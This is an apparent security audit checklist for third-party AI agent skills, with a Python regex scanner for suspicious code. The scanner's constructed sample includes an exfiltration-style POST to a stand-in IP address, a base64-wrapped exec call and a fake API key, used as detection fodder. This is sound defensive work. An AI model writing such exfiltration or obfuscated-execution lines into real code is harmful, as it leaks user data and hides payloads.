Skill Security Audit Checklist
Before deploying any skill — whether from ClawHub or a third-party source — conduct a security audit. This checklist covers the critical areas to review.
Pre-Installation Review
- Read the entire SKILL.md file. Understand what the skill instructs the agent to do.
- Review all scripts in the scripts/ directory. Check for obfuscated code, network calls, or file operations outside the workspace.
- Verify the author's identity. Check their ClawHub profile, GitHub history, and community reputation.
- Check the skill's permission requirements. Be wary of skills that request broad file system access or unrestricted command execution.
Code Review
- Search for hardcoded URLs or IP addresses — these could indicate data exfiltration endpoints
- Check for eval(), exec(), or dynamic code execution patterns
- Verify that API keys or credentials are not embedded in the skill
- Ensure file operations are scoped to the workspace directory
- Look for base64-encoded strings that could hide malicious payloads
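A first pass over the Code Review items can be automated before reading the scripts by hand. The scanner below is an added example, not part of ClawHub or any skill tooling; its regexes, category names, and the 24-character and 80%-printable base64 thresholds are assumptions to tune, and the sample script is constructed.

```python
import base64
import re
from pathlib import Path

# Heuristic patterns, one per Code Review item (assumed; tune per codebase).
PATTERNS = {
    "hardcoded-url": re.compile(r"https?://[^\s'\"<>)]+"),
    "hardcoded-ip": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "dynamic-exec": re.compile(r"\b(?:eval|exec)\s*\("),
    "embedded-credential": re.compile(
        r"(?i)\b(?:api[_-]?key|secret|token|password)\b\s*[:=]\s*['\"][^'\"]{8,}['\"]"),
}
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

# Constructed sample script, not taken from any real skill.
SAMPLE = "\n".join([
    "import os",
    'requests.post("http://203.0.113.7/upload", data=blob)',
    'exec(base64.b64decode("%s"))' % base64.b64encode(b"constructed sample payload").decode(),
    'API_KEY = "sk-constructed-0000000000"',
])

def decodes_as_base64(candidate):
    """True if the run is valid base64 that decodes to mostly printable bytes."""
    try:
        raw = base64.b64decode(candidate, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in raw)
    return bool(raw) and printable / len(raw) > 0.8

def audit_text(text):
    """Return (line_number, category, matched_text) for each suspicious match."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for category, pattern in PATTERNS.items():
            findings += [(lineno, category, m.group(0)) for m in pattern.finditer(line)]
        findings += [(lineno, "base64-blob", m.group(0))
                     for m in B64_RUN.finditer(line) if decodes_as_base64(m.group(0))]
    return findings

def audit_skill(skill_dir):
    """Scan every file under a skill directory; return {path: findings}."""
    results = {}
    for path in sorted(p for p in Path(skill_dir).rglob("*") if p.is_file()):
        hits = audit_text(path.read_text(errors="replace"))
        if hits:
            results[str(path)] = hits
    return results
```

A hit is a prompt for manual review, not a verdict: version strings match the IP pattern, and base64 that decodes to binary data is not flagged by the printable-text heuristic.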
Runtime Monitoring
After installation, monitor the skill's behavior during its first several uses:
- Enable verbose logging to capture all actions the skill triggers
- Watch for unexpected network connections
- Verify that file access stays within expected boundaries
- Check that the skill's actual behavior matches its documented behavior